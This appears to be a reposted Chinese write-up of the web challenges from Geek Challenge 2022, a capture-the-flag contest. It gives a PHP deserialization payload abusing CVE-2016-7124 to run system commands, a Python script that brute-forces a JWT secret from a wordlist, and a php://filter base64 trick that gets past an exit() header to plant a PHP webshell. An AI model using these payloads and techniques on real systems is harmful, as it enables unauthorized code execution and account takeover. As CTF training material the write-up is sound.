CVE-2016-7124 原理简单来说就是通过传递的序列化更改对象数量值,使之大于现有的传入对象,可以绕过

__wakeup

魔法函数的执行。

O:15:"BillyHerrington":2:{s:1:"a";O:8:"Baoglady":2:{s:1:"b";O:12:"VanDarkholme":1:{s:1:"d";N;}s:1:"c";s:15:"system('ls /');";}}

得到:

image-20221118171518748

所以最终payload:

O:15:"BillyHerrington":2:{s:1:"a";O:8:"Baoglady":2:{s:1:"b";O:12:"VanDarkholme":1:{s:1:"d";N;}s:1:"c";s:26:"system('cat /flagishere');";}}

image-20221118171638541

flag:

SYC{XD_why_php_s0_1nter3sting}

0x0d 题目:easygame

GeekChallengeUser ~ % ./easygame

=== challenge info ===
type: web
points: 250
description: http://121.5.62.30:40050/
hint: 字典: 链接:https://pan.baidu.com/s/1Fgp6xyDbykwQE6UyTZ6-bA?pwd=1234 提取码:1234
=== challenge info ===

解题思路

进入网址,根据提示先new一个User:

/newUser?userName=Syclover&password=666

得到提示,是一串token:

成功辣,带上这个去/secure/admin试试运气吧:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwYXNzd29yZCI6IjY2NiIsImlkIjoxLCJ1c2VyTmFtZSI6IlN5Y2xvdmVyIiwiZXhwIjoxNjY4NzY1MTU0LCJpYXQiOjE2Njg3NjMzNTR9._GoRgp06XkKKLs_T2EpphREcS8zVL-DzQI85ikps6K4

传入

/secure/admin

路径后得到:

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8Date: Fri, 18 Nov 2022 09:24:21 GMT
Content-Length:89

当前用户信息id=1,userName=Syclover,password=666 不是admin不能继续下一关哦

token不是admin用户的,需要根据题目给的字典进行爆破JWTtoken的 secret,爆破脚本如下:

import jwt
import termcolor

jwt_str = R'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwYXNzd29yZCI6IjY2NiIsImlkIjoxLCJ1c2VyTmFtZSI6IlN5Y2xvdmVyIiwiZXhwIjoxNjY4NzY1MTU0LCJpYXQiOjE2Njg3NjMzNTR9._GoRgp06XkKKLs_T2EpphREcS8zVL-DzQI85ikps6K4'withopen("top1000.txt","r")as f :for line in f:
        key_ = line.strip()try:
            jwt.decode(jwt_str, verify=True,key=key_,algorithms='HS256')print('\r','\bbingo! key-->',termcolor.colored(key_,'green'),'<--')breakexcept(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):print('\r','\bbingo! key-->',termcolor.colored(key_,'green'),'<--')breakexcept jwt.exceptions.InvalidSignatureError:print('\r',' '*64,'\r\btry',key_,end='',flush=True)continueelse:print('\r','\bnot found.')

爆破得到密钥:

bingo! key--> loveSyc <--  

重新制作token:

image-20221118174752379

得到新的token,换上,再访问

/secure/admin

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8Date: Fri, 18 Nov 2022 09:48:29 GMT
Content-Length:84

5LiL5LiA5YWz55u05o6l5Y67L1htbOeci+eci+acieayoeacieS9oOaDs+imgeeahOS4nOilv+WQpyEhIQ==

base64解密得:

下一关直接去/Xml看看有没有你想要的东西吧!!!

带着token去访问

/Xml

,得到:

<user><firstname>Syclover</firstname><lastname>Good!!!</lastname></user>

没思路了,菜

flag:

0x0e 题目:edit_php

GeekChallengeUser ~ % ./edit_php

=== challenge info ===
type: web
points: 250
description: http://49.235.109.5:8302/
hint: 题目每隔二十分钟刷新;需要简单提权
=== challenge info ===

解题思路

没做出,菜

0x0f 题目:ezrequset

GeekChallengeUser ~ % ./ezrequset

=== challenge info ===
type: web
points: 250
description: 依梦学姐想上水课,你能帮帮她吗
hint:
=== challenge info ===

解题思路

通过正则匹配需求,然后编写python脚本进行抢课,成功后查看cookie即得flag,脚本如下:

import requests
import re
header ={"Cookie":"PHPSESSID=19f3724c95dffb937b3ac23a13a223ad; path=/",}
url_index ="http://p4fa04c6-697d-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=index"
res = requests.post(url_index,data={'xh':1234},headers=header)
txt = res.text
# print(txt)
xlass = re.findall(r"鱼:(.+?)<!DOCTYPE",txt)[0]print(xlass)
no = re.findall(r"(.+?)号",xlass)[0]print(no)
xlass1 = re.findall(r"号(.*)",xlass)[0]print(xlass1)
url_check ="http://p4fa04c6-697d-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=check"
data ={"num":no,"class":xlass1,}
res1 = requests.post(url_check,data,headers=header)print(res1.text)
cookie = requests.utils.dict_from_cookiejar(res1.cookies)print(cookie)

需要提前抓包获得一份Cookie放到header中

运行结果:

image-20221121174705697

flag:

SYC{just_@_ez_requ3st}

0x10 题目:Not_Stay

GeekChallengeUser ~ % ./Not_Stay

=== challenge info ===
type: web
points: 250
description: http://1.14.92.115:9091/
hint: stay,don't exitt
=== challenge info ===

解题思路

进入网址,得到源码:

<?php//简单的实现文件头检测include_once('waf.php');functionuuid(){$chars=md5(uniqid(mt_rand(),true));$uuid= substr ($chars,0,8).'-'. substr ($chars,8,4).'-'. substr ($chars,12,4).'-'. substr ($chars,16,4).'-'. substr ($chars,20,12);return$uuid;}$safe_header='<?php exit();?>';if(!isset($_COOKIE['path'])){setcookie('path',uuid());exit();}$path='./upload/'.$_COOKIE['path'].'/';if(!is_dir($path)){mkdir($path);chmod($path,0755);}$file_data=$_POST['data'];$filename=$_POST['filename'];if(isset($_POST['data'])){file_put_contents('/tmp/'.$_COOKIE['path'],$file_data);$file_type=exif_imagetype('/tmp/'.$_COOKIE['path']);if($file_type!="GIF"&&$file_type!="PNG"){die('nonono');}}else{echo"I need data";}if(isset($_POST['filename'])){file_put_contents($filename,$safe_header.$file_data);}else{echo"I need name";}show_source(__FILE__);?>

这是一道PHP文件上传的题,主要漏洞函数为

file_put_contents()

,这里利用的是最后一个

file_put_contents()

因为第一个file_put_contents传的是根目录下的/tmp文件夹,没有权限读写。

if(!is_dir($path)){mkdir($path);chmod($path,0755);}

这里好心的帮我们赋予了读取的权限,即只需要在最后的file_put_contents进行写入我们的

木🐎

文件

ps:由于我懒得用蚁剑上马,这里我直接用system命令判断flag位置并读取了

第一步是文件头判断的过滤,关键代码位于:

$file_type=exif_imagetype('/tmp/'.$_COOKIE['path']);if($file_type!="GIF"&&$file_type!="PNG"){die('nonono');}

这个其实是最简单的,只需要上传的

$file_data

开头包含

GIF89a

即可。

例如我们需要上传的数据为 abcd 只需要改为 GIF89aabcd

第二步是绕过

<?php exit();?>

,关键代码位于:

$safe_header='<?php exit();?>';if(isset($_POST['filename'])){file_put_contents($filename,$safe_header.$file_data);}else{echo"I need name";}

可以看到这个

<?php exit();?>

被加在了文件的最开头,导致后面无论是什么都不会执行。

绕过方法是通过php://filterbase64-decode

<?php exit();?>

变成

phpexit

具体原理是base64编码中不包含

<?();?>

等字符,解码时会将其直接抛弃。

这里还需要注意,base64是8位一组进行解码,phpexit是7字节,所以还需要补上1字节(这里加个

a

payload

–>

apayload

由于开头还得是

GIF89a

,长度为6字节,所以还需补上2字节

所以最终payload应为(补了3个

a

):

payload

-->

GIF89aaaapayload

ok思路有了,开始拿flag:

构造base64:

base64_encode("GIF89a<?php echo system("ls /");?>");#R0lGODlhPD9waHAgZWNobyBzeXN0ZW0oImxzIC8iKTs/Pg==

其实base64_encode()里面的

GIF89a

是不需要的,当时忘记删了,但是不影响最后拿flag😂

上传到目录

./upload/q1jun

下的123.php

image-20221120121125145

访问

http://1.14.92.115:9091/upload/q1jun/123.php

查看根目录下是否有flag:

image-20221120120856738

flag位于

/flagishere

构造base64:

base64_encode("GIF89a<?php echo system("cat /flagishere");?>");# R0lGODlhPD9waHAgZWNobyBzeXN0ZW0oImNhdCAvZmxhZ2lzaGVyZSIpOz8+

注意:记得把base64中的

+

进行url编码,否则写入到文件里的base64编码是没有

+

的。

构造payload:

data=GIF89aaaaR0lGODlhPD9waHAgZWNobyBzeXN0ZW0oImxzIC8iKTs/Pg%3d%3d&filename=php://filter/write=convert.base64-decode/resource=./upload/q1jun/123.php

再次访问

http://1.14.92.115:9091/upload/q1jun/123.php

得到flag:

image-20221120121456645

flag:

SYC{stay_0r_get_0ut_here!}
标签: 网络安全 web

本文转载自: https://blog.csdn.net/ShangYaoPaiGu/article/details/127970074
版权归原作者 q1jun 所有, 如有侵权,请联系我们删除。

“[Geek Challenge 2022]Web部分 writeup by q1jun”的评论:

还没有评论